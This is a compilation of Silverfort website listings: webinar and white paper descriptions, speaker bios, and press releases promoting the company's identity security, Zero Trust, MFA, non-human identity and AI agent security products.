In the third part of this series, our guest speaker Dr. Chase Cunningham, former Forrester VP and Principal Analyst, will explain why service accounts, used for machine-to-machine access, must be included in any Zero Trust initiative. Hed Kovetz will explain how Silverfort automatically discovers, monitors and secures these sensitive non-human accounts with self-learning Zero Trust policies, without requiring password changes.
Other topics covered in this series:

- Why Unified IAM Visibility and Control is Key for Zero Trust Security
- The Importance of Risk Analysis and Adaptive Policies in Zero Trust Security
- Enabling Cloud Migration with Identity-Based Zero Trust

---

- Published: 2021-02-22
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/thank-you-page-enabling-cloud-migration-with-identity-based-zero-trust/

Zero Trust security goes beyond the traditional perimeter-based security model, and enables companies to migrate assets outside of their on-premise environment without compromising on security.

In the final part of this four-part series, our guest speaker Dr. Chase Cunningham, former Forrester VP and Principal Analyst, will explain the challenges and the importance of Zero Trust security in the cloud and in hybrid environments. Hed Kovetz will explain how to leverage an identity-based Zero Trust approach to protect cloud and hybrid environments holistically, covering both cloud-native assets and migrated apps, enabling secure ‘Lift and Shift’ cloud migration – no code changes required.

Other topics covered in this series:

- Why Unified IAM Visibility and Control is Key for Zero Trust Security
- The Importance of Risk Analysis and Adaptive Policies in Zero Trust Security
- Why Service Accounts and Machine-to-Machine Access Should be Part of Any Zero Trust Initiative

---

- Published: 2021-02-11
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/risk-analysis-and-adaptive-policies-in-zero-trust-security/

In order to achieve effective Zero Trust security, you have to continuously analyze risk across all users, devices, systems and environments.
A Zero Trust policy engine is essential to securing the fundamental flow of people accessing resources with devices through a network. In the second part of this series, Dr. Chase Cunningham will explain why controlling the flow of data with identity-based MFA and Zero Trust policies must be included in any Zero Trust initiative. Hed Kovetz will explain how Silverfort automatically discovers, monitors and secures these sensitive non-human accounts with self-learning Zero Trust policies, without requiring password changes.

Other topics covered in this series:

- Why Unified IAM Visibility and Control is Key for Zero Trust Security
- Why Service Accounts and Machine-to-Machine Access Should be Part of Any Zero Trust Initiative
- Enabling Cloud Migration with Identity-Based Zero Trust

---

- Published: 2021-02-09
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/thank-you-page-why-unified-iam-visibility-control-is-key-for-zero-trust/

Successful Zero Trust implementations focus heavily on telemetry and metrics derived from identities. Anything that has an identity must be considered and verified in order to achieve true Zero Trust security — users, services, devices and cloud assets. Monitoring these identities and their behavior enables a deeper understanding of what an entity is doing, to better identify and prevent malicious or unauthorized access.

Join Silverfort’s CEO and Co-Founder Hed Kovetz, and guest speaker Dr. Chase Cunningham, former Forrester VP and Principal Analyst, for a discussion on the different aspects and the growing importance of identity in Zero Trust implementations.
Other topics covered in this series:

- The Importance of Risk Analysis and Adaptive Policies in Zero Trust Security
- Why Service Accounts and Machine-to-Machine Access Should be Part of Any Zero Trust Initiative
- Enabling Cloud Migration with Identity-Based Zero Trust

---

- Published: 2020-11-19
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/silverfort-adaptive-authentication-white-paper/

This white paper reviews the benefits and challenges of adaptive authentication.

Download the Silverfort adaptive authentication white paper: Silverfort delivers adaptive authentication across all corporate networks and cloud environments from a unified platform, without requiring any software agents or inline proxies. By analyzing authentication activity across all users, devices, systems and environments, and leveraging Silverfort’s AI-based Risk Engine, it enables holistic risk-based adaptive authentication with unparalleled accuracy.

Download this PDF to:

- Learn the benefits and challenges of adaptive authentication
- Get a technical overview of Silverfort’s holistic risk engine
- Understand the unique advantages of Silverfort’s agentless next-generation authentication platform

---

- Published: 2020-10-28
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/thank-you-page-four-simple-steps-to-secure-your-service-accounts-30-minutes-on-demand/

With hundreds or even thousands of unsupervised, highly privileged service accounts running in modern organizations, they can become high-risk assets. Join us for a discussion about four simple steps you can take to secure these accounts and reduce the risk of a cyber attack.
Speakers:

- Hed Kovetz, Silverfort Co-Founder and CEO. Hed brings a unique technical and leadership background, including product leadership roles at Verint, where he led the company’s nation-scale cybersecurity product and won the company’s innovation competition for his patent-pending inventions. Hed previously served as a Group Leader at the famous 8200 elite cyber unit of the Israel Defense Forces, where he received the unit’s excellence awards and the Chief of Intelligence Corps Award for Innovation. Hed holds an LL.B. from Tel Aviv University.
- Revital Aronis, Sr. Product Manager, Silverfort. Revital is a Senior Product Manager in Silverfort’s PM department. Prior to joining Silverfort, Revital was a product manager at illusive networks, and held different R&D positions at Contextream and HPE. Before that Revital served as a team leader at the 8200 elite cyber unit of the Israel Defense Forces. Revital holds a B.A. in Computer Science and Psychology from Tel Aviv University.

---

- Published: 2020-09-22
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/thank-you-page-form-extending-yubikey-fido2-hardware-tokens-to-any-system-and-interface-with-silverfort-2/

Now more than ever, organizations need a holistic authentication solution to maximize security without disrupting productivity. An efficient way to do so is to strengthen weak static username/password credentials with strong FIDO2 hardware-backed public/private-key credentials.
In this session with Silverfort and Yubico experts, we’ll review the integrated solutions, discuss key customer use cases and explain how you can now:

- Extend FIDO2 hardware-backed Multi-Factor Authentication to any system or interface
- Enforce strong authentication without implementing software agents, changing application code, or using proxies
- Take advantage of the integrated solutions to address various use cases

Speakers:

- Jonathan Nativ, Sales Director, APAC at Silverfort. Jonathan Nativ is the Sales Director for APAC at Silverfort, the provider of agentless authentication solutions. Before moving into Sales, Jonathan managed all the pre-sales activities at Silverfort for EMEA and APAC. Prior to that, Jonathan worked for 6 years at CyberArk Software, where he managed all training activities in EMEA and APAC as well as managing channel pre-sales activities in EMEA. Jonathan holds a BA in IT Management from Ben Gurion University as well as an MBA from Tel Aviv University.

---

- Published: 2020-07-29
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/partner-spotlight-series-silverfort-talks-about-meeting-customer-demands-with-the-yubikey/

Silverfort enables customers to seamlessly extend hardware-backed multi-factor authentication (MFA) with YubiKey across all systems and environments without requiring additional agents, proxies or software changes. Silverfort enables customers to leverage the combined security of FIDO2/WebAuthn and YubiKey hardware to extend adaptive authentication and zero-trust policies to effectively prevent unauthorized access to sensitive assets.

https://www.youtube.com/watch?v=1UT3-z-wNXc

---

- Published: 2020-07-23
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/thank-you-page-form-blocking-identity-based-threats-with-silverfort-palo-alto-networks-cortex-xsoar-2/

Automate your security operations and response to identity-based threats and behavior anomalies with Silverfort playbooks. Learn how to:

- Automate threat enrichment with Silverfort’s continuous AI-driven risk data
- Automate step-up authentication with agentless multi-factor authentication
- Automate response to malicious user activities
- Automate service account security
- Automate the enforcement of dynamic zero-trust policies

Speakers:

- Hed Kovetz, Silverfort Co-Founder and CEO. Hed brings a unique technical and leadership background, including product leadership roles at Verint, where he led the company’s nation-scale cybersecurity product and won the company’s innovation competition for his patent-pending inventions. Hed previously served as a Group Leader at the famous 8200 elite cyber unit of the Israel Defense Forces, where he received the unit’s excellence awards and the Chief of Intelligence Corps Award for Innovation. Hed holds an LL.B. from Tel Aviv University.
- Ron Rasin, VP Product Management. Ron leads Silverfort’s product management and roadmap. He brings over a decade of hands-on product management experience and cyber security expertise. Prior to joining Silverfort, Ron was the Director of Product Management at Claroty, and held product management roles at Wix and NCR. Before that Ron served as a Team Leader at the 8200 elite cyber unit of the Israel Defense Forces. Ron holds a B.A. in Economics from Tel Aviv University.

---

- Published: 2020-07-20
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/securing-service-accounts-without-changing-passwords/

Service accounts are a prime target for hackers.
However, securing the use of service accounts is a major challenge for enterprises. Silverfort’s Agentless Authentication platform is uniquely positioned to protect Active Directory domain service accounts without the intrusive need for frequent password changes, or even being aware of their existence. Silverfort’s CTO and Co-Founder Yaron Kassner discusses this with SecurityGuyTV.com during the Coronacon 2020 virtual conference:

https://vimeo.com/439936324

---

- Published: 2020-06-23
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/okta-silverfort-multi-factor-authentication-for-desktops-and-systems-across-the-enterprise/

Silverfort’s integration with Okta extends your MFA coverage to the places it’s traditionally never reached—like legacy applications, command-line tools, file shares, and on-prem servers. This solution brief walks you through how the Silverfort + Okta partnership brings adaptive, risk-based MFA to your entire environment—on-prem and in the cloud—without creating user friction.

By combining Silverfort’s real-time risk analysis with Okta’s proven MFA, organizations can detect identity threats faster, respond smarter, and protect every access point—including ones Okta couldn’t reach before. And the best part? Users only get MFA prompts when something’s suspicious, reducing fatigue while increasing security. Whether you’re looking to bolster your zero trust strategy or eliminate MFA blind spots, this guide is your starting point.

In this PDF, you’ll learn how to:

- Extend Okta MFA to all resources, even legacy and on-prem systems that previously couldn’t be protected.
- Leverage adaptive risk analysis to enforce MFA only when needed, minimizing disruption and fatigue.
- Deliver a consistent user experience with one unified MFA flow across cloud and on-prem access.
Get the solution brief now to discover how you can turn Okta into an end-to-end MFA powerhouse with Silverfort.

---

- Published: 2020-05-31
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/can-you-detect-and-block-the-evasive-threat-of-lateral-movement/

After penetrating the network, hackers use various lateral movement techniques to gain access to their target systems and data. In order to prevent compromise, you need to detect and block lateral movement attempts early on. However, that’s not a simple task.

Watch this recorded webinar to learn:

- What lateral movement means
- How lateral movement techniques are used in a range of attacks
- Ways to detect and block various attacks at an early stage

Speakers:

- Mike Carroll, CISSP, Sr. Sales Engineer at Silverfort. Mike Carroll is a senior engineer with 20 years’ experience in IT security, from desktop technician to Unix systems administrator to IT Director and into independent consulting, delivering world-class solutions to world-class companies spanning every major industry. Mike has broad experience with enterprise-class Unix/Linux and Microsoft-based security and management technologies, and a comprehensive understanding of modern Privileged Account Management, including hands-on experience with solutions from Quest, BeyondTrust and CyberArk, as well as Multifactor Authentication.
- Rich Peckham, Solution Architect at Silverfort. Rich is a Solution Architect at Silverfort. He has more than 20 years of experience with Active Directory and cybersecurity. Prior to joining Silverfort, Rich was a Senior Infrastructure Systems Engineer with Facebook for 2 years.
Prior to Facebook, Rich was with Microsoft for over 10 years as a Senior Premier Field Engineer for Active Directory and then as a Senior Service Engineer specializing in Active Directory cybersecurity. Rich is also a Microsoft Certified Master in Active Directory on Windows Server 2008 and Windows Server 2008 R2 and a Microsoft Certified Solutions Master in Windows Server 2012.
- Gal Sadeh, Sr. Data Scientist at Silverfort. Gal is a Senior Data Scientist in Silverfort’s research team. He is responsible for big data analytics and developing AI engines. He joined Silverfort after many years of research and leadership roles at the 8200 elite cyber unit of the Israel Defense Forces. Gal holds a B.Sc. in Mathematics and Computer Science from Tel Aviv University.

---

- Published: 2020-05-19
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/thank-you-page-form-is-remote-access-putting-your-organization-at-risk/

Recent events forced us to change the way we work and today most employees are working remotely. While enabling remote access is critical these days, it’s also exposing us to more risk: when hundreds of users are inside the network – who is monitoring and validating that access to our most sensitive assets is legitimate and secure?

In this webinar, we’re discussing why remote access is putting organizations at risk. We will review examples of relevant attacks that target our most critical assets, like Active Directory. Finally, we’ll discuss what should be done to mitigate the threat and protect sensitive assets from breach and compromise.
Watch this recorded webinar to learn:

- Why remote access is putting organizations at risk
- Examples of relevant attacks that target the most critical assets, like Active Directory
- What should be done to mitigate threats and protect sensitive assets from breach and compromise

Speakers:

- Hed Kovetz, Silverfort Co-Founder and CEO. Hed brings a unique technical and leadership background, including product leadership roles at Verint, where he led the company’s nation-scale cybersecurity product and won the company’s innovation competition for his patent-pending inventions. Hed previously served as a Group Leader at the famous 8200 elite cyber unit of the Israel Defense Forces, where he received the unit’s excellence awards and the Chief of Intelligence Corps Award for Innovation. Hed holds an LL.B. from Tel Aviv University.
- Gil Kirkpatrick, Chief Architect at Semperis. Gil Kirkpatrick is an identity security veteran and 15-time Microsoft MVP. Gil is Chief Architect at Semperis and previously held senior leadership positions at NetPro, Quest Software, and ViewDS Identity Solutions. He literally wrote the book on Active Directory Programming and is known as the founder of the Directory Experts Conference (later renamed The Experts Conference). He’s also a founding member of the Hybrid Identity Protection conference.

---

- Published: 2020-03-12
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/secure-remote-access/

Organizations are looking to enable employees to work remotely, outside of the formal office, for extended periods of time. Silverfort enables frictionless secure authentication for any user, any device and any resource, including MFA on-premise or in the cloud, without requiring any software agents, proxies or code changes.
Download this brief to learn how Silverfort can:

- Secure remote authentication and access to any resource, including systems you couldn’t protect until today, like IT infrastructure, legacy and homegrown apps, file shares and more
- Enable Multi-Factor Authentication (MFA) for remote VPN access, SaaS applications and more
- Deliver holistic policy enforcement across all sensitive assets

---

- Published: 2020-02-04
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/recorded-session-enabling-secure-authentication-and-zero-trust/

Dries Robberechts, Director of EMEA Sales, explains how Silverfort enables secure authentication and Zero Trust in today’s perimeter-less networks.

Accelerate 19 session: Silverfort enables adaptive multi-factor authentication for every sensitive user, device and asset across all environments. Seamlessly deployed, without any software agents or inline gateways, Silverfort allows security teams to protect corporate identities and critical assets, prevent data breaches and address compliance regulations.

https://www.youtube.com/watch?v=bQw_yv-auLI

---

- Published: 2020-02-03
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/secure-authentication-across-it-and-ot-networks/

Secure Authentication Across IT and OT Networks: Silverfort applies an innovative architecture and a powerful AI-driven risk engine to monitor, analyze and secure all authentication and access across the enterprise, including both IT and OT networks, without agents or proxies.
Download this brief to:

- Learn how Silverfort can protect SCADA servers, HMIs and workstations
- Understand the non-intrusive, agentless, proxyless architecture that enables it
- Review the different use cases that can be addressed with Silverfort

---

- Published: 2019-02-10
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/silverfort-platform-integration-with-azure-active-directory/

Silverfort integrates directly with Azure Active Directory to influence conditional access policies in Entra ID (formerly Azure AD) in real time and to deliver unified authentication policies. Silverfort also integrates with the Microsoft Security Graph API to share Silverfort’s continuous AI-driven risk assessment with Microsoft and to get risk indicators from Microsoft, applying intelligent security policies across the board.

https://www.youtube.com/watch?v=A2ZMxPFsQmw

---

- Published: 2018-11-28
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/next-generation-authentication-for-financial-services/

Cybersecurity is a top concern for banks, insurance companies, investment funds and other...

Download the Silverfort solution brief for financial services: Silverfort’s agentless and holistic MFA platform monitors user access across all systems and environments and enforces adaptive AI-driven MFA, enabling financial organizations to mitigate threats in real time and achieve compliance with PCI DSS, SWIFT CSP, NY-DFS, GDPR and more.
Download the brief to learn about:

- Agentless MFA for homegrown applications and legacy systems
- Holistic visibility and risk assessment
- AI-driven authentication across all systems and environments
- Addressing compliance requirements with Silverfort

---

## News and press

- Published: 2025-06-18
- Modified: 2025-06-18
- URL: https://www.silverfort.com/press-news/silverfort-unveils-ai-agent-security/

Identity and access security layer gives enterprises the confidence to rapidly and securely adopt AI agents and accelerate innovation

Boston, MA — June 18, 2025, 9 a.m. ET — Today Silverfort, the leading identity security company, released its latest innovation, AI Agent Security. The new product empowers CISOs and their organizations to securely adopt AI by controlling what AI agents are allowed to access and protecting their identities. It keeps them governed, visible, and protected with the same rigor applied to human users. Trusted by more than 1,000 organizations, including many of the world’s largest enterprises, Silverfort has an advantage in solving this emerging need at enterprise scale. With Silverfort AI Agent Security, teams can tether every AI agent to a human identity, analyze its activity and the resources that it’s trying to access, and dynamically enforce access control policies to prevent misuse and data leakage.

AI agents operate in a grey area between human and non-human identities, requiring purpose-built security to match their unique risks. AI agents act autonomously, make decisions, and access sensitive systems, frequently using delegated or privileged identities, which obscures accountability. Many organizations adopt the MCP protocol to allow AI agents to access corporate resources, but do so without a clear security framework, exposing critical systems to potential misuse. MCP enables highly dynamic, implicit access to internal resources based on model behavior.
Without strict boundaries or observability, this can lead to unrestricted and unmonitored access across critical systems by AI agents that often act unpredictably.

“The pressure to adopt AI is growing rapidly. CISOs and CIOs face a task that feels impossible—aggressively adopt AI, yet be sure to keep the company’s systems safe,” said Yaron Kassner, CTO and co-founder, Silverfort. “Today AI agents connect straight from the LLM into corporate data stores with limited visibility or guardrails. By treating AI agents as a new type of identity, and connecting them to their human owners, we create an audit trail of activity and accountability. Further, security teams can apply the inline security controls they need to allow teams to innovate and accelerate AI adoption, without the fear of destruction to corporate data and reputation.”

Silverfort approaches securing AI agents the same way it secures human identities and service accounts: inline and in real time. Just as Silverfort protects authentication protocols like NTLM and OpenID Connect, it now protects MCP, too. Silverfort’s model ties every agent action to a real human owner, enforces least privilege, and logs an immutable audit trail. Sitting inline between the AI agent and the MCP server, Silverfort inspects every call before it reaches the target resource, protecting all corporate systems with robust, real-time security controls and preventing AI agents from going beyond their intended purpose and causing damage.

Benefits include:

- Inline security controls: Dynamically grant or deny access of AI agents to MCP servers and other corporate systems, restricting over-privileged access.
- Control of AI tools: Approve how and when MCP servers & API tools are used.
- Accountability and auditability: Link every AI agent action to the initiating human for clear accountability and to create an audit trail.
- Stop AI agent overreach: Prevent misuse and data leakage, whether malicious or accidental.
Make it impossible for AI agents to act outside of their original purpose, and for attackers to use them for lateral movement or privilege escalation.

Combined with precise least-privilege access enforcement, AI agents are strictly limited to actions they are explicitly authorized to perform, so every decision aligns with both security policies and contextual relevance. Organizations can discover and classify AI agents, monitor their activity, and tie each one to a human owner. Designed for ease and quick deployments, Silverfort integrates with no impact to end users or the developers building the agents. Learn more about Silverfort AI Agent Security and see how to safely innovate with AI agents, without compromise.

About Silverfort

Fueled by a belief that identity professionals deserve better, we found a way to break down the silos of identity security—eliminating the gaps and blind spots left behind by a patchwork of point solutions. The Silverfort Identity Security Platform is the first to deliver end-to-end identity security, protecting every identity in the cloud, on-prem, humans, machines, and everything in between. Our patented technology—Runtime Access Protection (RAP)—natively integrates with the entire IAM infrastructure, giving businesses visibility into all identities, analyzing every access, and extending active protection to resources that could not be protected previously—including NHIs, legacy systems, command line tools, and IT/OT infrastructure. It is easy to deploy and use, and doesn't disrupt business operations, resulting in better security outcomes with less work. Silverfort is the identity security platform that both identity and security professionals deserve, earning the trust of more than 1,000 leading organizations, including several Fortune 50 companies. Learn more at silverfort.com.
---

- Published: 2025-06-05
- Modified: 2025-06-05
- URL: https://www.silverfort.com/press-news/silverfort-appoints-howard-greenfield-president-and-cro/

Former CRO of SailPoint and Centrify joins Silverfort to support the company's rapid growth and identity security market leadership

Boston, Mass. — June 5, 2025 — Silverfort, the leading identity security company, today announced the appointment of Howard Greenfield as President and Chief Revenue Officer (CRO). Greenfield brings extensive experience in Go-To-Market (GTM) leadership after successfully bringing multiple identity companies to scale, including taking SailPoint through its first IPO. Howard joins Silverfort after a milestone year, in which the company grew its customer base to more than 1,000 companies and expanded its offering through innovation and M&A to become the most complete identity security platform. Greenfield will lead Silverfort’s GTM strategy and execution, including global sales and marketing, and navigate the company’s next stage of growth to strengthen its market leadership.

“Welcoming Howard to our leadership team, with his vast experience, vision, and operational rigor is truly a game-changer,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “Market demand for identity security is skyrocketing, and Silverfort is scaling both its business and its platform at an unmatched pace, establishing itself as the leading identity security platform. With Howard’s deep understanding of the identity market and proven ability to scale companies to hundreds of millions in ARR, guiding them through significant milestones and achievements, his leadership will be instrumental as Silverfort expands.”

Before joining Silverfort, Greenfield was an Operating Partner at venture capital firm Canaan, where he helped many portfolio companies with their GTM approach and was a key driver for several successful exits, such as Axis Security and MachEye.
Prior to that, as CRO at Centrify, a Privileged Access Management (PAM) provider now known as Delinea, he led the sales, marketing, partner and customer success teams, growing revenues to culminate in a successful exit to private equity firm TPG. Earlier, Greenfield was the CRO at SailPoint, one of the world’s leading identity companies, where he was instrumental in rapidly growing ARR and expanding the customer base, positioning the company for a successful IPO in 2017.

As President and CRO at Silverfort overseeing sales and marketing, Greenfield will create strong alignment and partnership between both departments, driving fast growth to elevate Silverfort’s position as the identity security market leader even further. Greenfield will also focus on expanding the Silverfort partner community and channel-first strategy, empowering partners to be trusted advisors in the emerging identity security market.

“Identity is central to every cybersecurity strategy, and what sets Silverfort apart is its distinctive end-to-end identity security platform approach, and unparalleled innovation,” said Greenfield. “I’m eager to join such a strong, engaged team—across executive leadership, investors, partners, customers, and employees—focused on scaling the business while staying true to the company’s culture. Maintaining exceptional customer retention and satisfaction, prioritizing collaborative teamwork, and continuously building innovative products that solve real problems in groundbreaking ways, Silverfort is uniquely positioned for long-term success as the Identity Security market leader.”

This announcement comes on the heels of significant evolution and growth for Silverfort. Now a global organization with more than 450 employees worldwide, over 1,000 companies trust Silverfort to secure their identities—whether in the cloud, on-prem, humans, or machines.
Already this year, Silverfort launched its new Privileged Access Security (PAS) offering which leverages unique technology, and expanded its Non-Human Identity (NHI) security offering to the cloud—following its acquisition of Rezonate and its integration into Silverfort’s platform in under six months. Fast Company also named Silverfort a 2025 Most Innovative Company under the security category.

To learn more about Greenfield’s vision and strategy during this pivotal phase of company growth, check out his full fireside chat on the Silverfort blog.

###
---

- Published: 2025-04-28
- Modified: 2025-04-28
- URL: https://www.silverfort.com/press-news/silverfort-expands-its-non-human-identity-nhi-security-offering/

Only Silverfort secures all human and non-human identities across all environments in a single platform—from workforce identities to workload identities, service accounts, access keys and tokens, whether on-prem, cloud-native or hybrid

Stop lateral movement, discover & visualize connections between human and NHIs across hybrid environments, enforce service accounts protection, and get actionable remediation recommendations

Boston, Mass. — April 28, 2025 — Silverfort, the leading identity security company, today introduced expanded protection of its non-human identity (NHI) security product to include cloud-based identities, covering NHIs in cloud identity providers, cloud infrastructure, and SaaS applications. With this announcement, Silverfort successfully integrated capabilities inherited from the Rezonate acquisition in November 2024. Organizations can now turn to Silverfort to meet every identity security need from human to non-human across their hybrid environments—from cloud to on-prem.

NHIs are mission critical for business, but secured as an afterthought

NHIs—service accounts, API keys, tokens, service principals, IAM roles, certificates, secrets, and more—are the connective tissue in an organization’s network. They are the backbone of a modern organization’s processes, allowing applications to interact with one another, yet their security remains fragmented and misaligned with their critical role. Created to “set and forget,” NHIs are difficult to track, and securing them is often split into minor features across different platforms, creating security gaps and blind spots. 56 percent of organizations unknowingly sync their service accounts to their SaaS directory, increasing the attack surface by creating a multitude of dormant accounts in cloud identity management platforms.
Excessive privileges, stale credentials, and lack of clear ownership make them prime targets for attackers and create compliance gaps. It’s estimated that NHIs outnumber human identities by at least 50 to one, and that gap is widening fast, fueled by the explosive growth of Generative AI and autonomous agents. Human identities often serve as the gateway to NHIs, which are a core component in an attacker’s kill chain.

“Emerging NHI-focused vendors attempt to address the problem with bespoke, point solutions that tackle a small fraction of the issue. But attackers don’t think in fragments. They exploit the entire attack surface, searching for any weakness that grants them access. Point solutions fail to provide full visibility into human and non-human identities across resources, leaving organizations with blind spots and unprotected gaps,” said Roy Akerman, VP of Identity Security Strategy, Silverfort. “To effectively manage NHIs, organizations need cross-platform, hybrid support, and a platform that can do more than secure NHIs. Yes, NHIs are a challenge, but they are only one element in the broader identity security challenge. That’s why at Silverfort, we’ve integrated our NHI security offering into our broader platform, giving our customers visibility into and control over the entire attack surface—not just the NHI components.”

Introducing the only identity security platform to cover both humans and NHIs across both cloud and on-prem

For the last few years, Silverfort has been on a mission to solve the unmet need for a unified platform that could secure all identities across all environments. As part of this vision, the company acquired Rezonate in late 2024, an innovative cloud identity security company with offerings that span identity threat detection and response (ITDR), identity security posture management (ISPM), Identity Governance and Administration (IGA) and NHI security.
By expanding its ability to secure cloud-based NHIs, Silverfort became the first company to provide seamless, scalable security for all human and non-human identities, both on-prem and in the cloud, from a single platform. With these capabilities, Silverfort has the power to map NHI effective privileges, activities, risk indicators and usage patterns. Using behavioral insights, Silverfort automatically generates policies that can halt lateral movement, blocking unauthorized access the moment an NHI deviates from its normal activity. Unlike traditional methods, Silverfort automatically determines the human ownership of each NHI, which makes it much easier to enforce accountability and streamline remediation. For faster deployments and easy ongoing maintenance, Silverfort integrates with existing identity infrastructure, from Active Directory to Entra ID, from AWS to Azure, from GitHub to Snowflake, providing cross-platform protection that spans hybrid environments, leaving no identity unprotected.

Key benefits include:

- Unified coverage for human identities and NHIs, both on-prem and in the cloud: Integrate intelligence from cloud and on-prem into a unified interface to secure all human and non-human identities, eliminating silos and enabling streamlined security operations.
- Complete discovery and ownership mapping: Discover and classify non-human identities—from on-prem Active Directory service accounts, to NHIs in cloud identity providers, cloud infrastructure, and SaaS applications. Conduct ownership mapping, view effective privileges, and eliminate redundant or excessive permissions.
- Proactive NHI security posture management: Use cross-platform context to analyze activity, risk indicators, ownership, misconfigurations, and usage patterns. Enhance overall NHI security posture with actionable insights into dormant, exposed, unrotated and other at-risk NHIs and remediation recommendations.
- Prevention of lateral movement and real-time protection of Service Accounts: Real-time enforcement of ‘Virtual Fencing’ for all Active Directory service accounts, to block any use of the account outside of its intended purpose, making lateral movement impossible. Automate protection of large numbers of service accounts with Silverfort’s Smart Policy, scaling and streamlining enforcement across large, complex environments.

The Silverfort Identity Security Platform

With identity security as Silverfort's sole focus and mission, the company pioneered a way to deliver end-to-end identity security—securing every dimension of identity via its patented technology, Runtime Access Protection (RAP). RAP natively integrates into an enterprise's identity infrastructure to extend protection to previously "unprotectable" assets like non-human identities (NHIs), legacy systems, command line tools, IT/OT infrastructure and more. The result is identity security with end-to-end visibility and active protection—with minimal disruption to users or administrators.

More than 1,000 enterprises including UPS, Airbus, and Kayak trust Silverfort to protect their identities. This involves analyzing and verifying over 10 billion authentications daily and deploying 17x faster than traditional identity security solutions for a better time to value. In the last year, Silverfort raised $116M in Series D funding, introduced Privileged Access Security (PAS), and launched its Identity-First Incident Response solution. Additionally, Fast Company named Silverfort a 2025 Most Innovative Company, listed in the security category alongside others who are pushing the boundaries of what’s possible to create a more secure world.

Silverfort will be at the RSAC™ Conference at booth number #3404. Learn more at RSA, book a demo to see Silverfort NHI Security in action, or visit Silverfort NHI Security for more details.
###

---

- Published: 2025-02-27
- Modified: 2025-02-27
- URL: https://www.silverfort.com/press-news/silverfort-stakes-its-claim-in-the-identity-security-market-with-patented-architecture-and-rebrand/

Introducing Runtime Access Protection (RAP) enabling the first end-to-end identity security platform, securing every identity across hybrid environments and disrupting siloed categories like NHI, PAM, MFA, ITDR and ISPM. New brand signals Silverfort’s next chapter of innovation and growth in identity security

Boston, Mass. — February 27, 2025 — Silverfort, the leader in end-to-end identity security, reveals details about its patented Runtime Access Protection (RAP) technology while simultaneously unveiling its new brand.
Powering the Silverfort Identity Security Platform, RAP brings identity security to systems and environments that couldn’t be protected before, breaks down silos, eliminates blind spots, and gives organizations actionable visibility into their entire identity fabric—in the cloud or on-premises, human or machine—for the very first time. Trusted by leading enterprises worldwide—Airbus, Rio Tinto, Coop, Kayak, Ryanair, Channel 4, Swiss Automotive Group, Singtel, amongst others—Silverfort analyzes and verifies over five billion authentications daily, detecting an average of 34K identity exposures and threats per customer. The platform deploys 17x faster than traditional identity security solutions, for a better time to value.

Identity represents the weakest link in enterprise security, with compromised credentials accounting for 80% of all breaches. For years, enterprises managed identity through a patchwork of on-prem identity management tools, one or more cloud identity providers (IdPs), and a mix of bespoke identity security solutions. Tools were built in silos—many long before cloud infrastructure and modern attack techniques existed—creating critical security gaps and access blind spots. The rise of AI and machine identities exacerbates the problem. This outdated approach forces enterprises to compromise on either security or usability—rarely can they achieve both.

"Active identity protection is no longer optional—it's critical to the health of a company's cybersecurity program," said Rob Ainscough, Chief Identity Security Advisor at Silverfort and former Head of Identity & Access Management at Tesco. "Enterprises need a solution that can surface every identity—even their unknowns—so they have a foundational understanding of what's in their environment. From there, the solution should deliver protection and controls at scale.
Legacy solutions provide incremental protections that take too long to implement and lack sufficient coverage leaving the door open to attackers. With its unique technical architecture at its foundation, Silverfort is the only player in the identity security market equipped to discover every identity and extend real-time protection across complex, hybrid environments, and resources."

A deeper look at Silverfort's innovation: Runtime Access Protection

With identity security as Silverfort's sole focus and mission, the company pioneered a way to deliver end-to-end identity security—securing every dimension of identity via its patented technology, Runtime Access Protection (RAP). RAP natively integrates into an enterprise's identity infrastructure to secure it from within. It removes the complexity of securing every identity and extends protection to previously "unprotectable" assets like non-human identities (NHIs), legacy systems, command line tools, IT/OT infrastructure and more. Once integrated into an organization's Identity Access Management (IAM) infrastructure, RAP forwards a user's access request to Silverfort for analysis and triggers inline security controls if needed. Silverfort sends its verdict to the IAM infrastructure to grant or deny access. The result is identity security with end-to-end visibility and active protection—with minimal disruption to users or administrators.

“For years, enterprises have struggled with a patchwork of on-prem identity tools, multiple cloud IdPs, and fragmented security solutions—which are built in silos, missing the bigger picture, and leaving many critical assets exposed,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “The result? Security gaps, access blind spots, and a lack of unified control. To make matters worse, identity security remains a shared responsibility across multiple teams, each with different authority and priorities, making real progress nearly impossible. We’re changing that.
We built the identity security platform the industry deserves—one that IAM teams can operate with ease and security teams can trust. No more silos. No more blind spots. This is identity security done right.”

A New Brand for a new era of identity security without limits

Along with revealing details about its innovative technology, Silverfort simultaneously unveils its bold new brand, including an entirely new look. For Silverfort, identity security isn’t just a feature—it’s the heart of the company’s mission. Fueled by the belief that identity and security teams deserve better, the company’s founders discovered a way to deliver end-to-end identity security that goes further than any other solution available today.

The new brand comes as the company evolves into a global organization with more than 450 employees worldwide, trusted by more than 1,000 companies. 2024 was a year of explosive growth and innovation. In the last year, Silverfort raised $116M in Series D funding, introduced Privileged Access Security (PAS), launched its Identity-First Incident Response solution, and addressed the gap in unified identity security for cloud environments with the acquisition of Rezonate. Today, Silverfort is the first to deliver a complete identity security platform protecting human and machine identities across on-prem assets, cloud identity providers, cloud infrastructure, and SaaS applications.

To learn more about identity protection and Silverfort's Identity Security Platform powered by Runtime Access Protection, visit www.silverfort.com/platform and request a demo today.

###

---

- Published: 2024-12-09
- Modified: 2025-02-26
- URL: https://www.silverfort.com/press-news/silverfort-unveils-privileged-access-security/

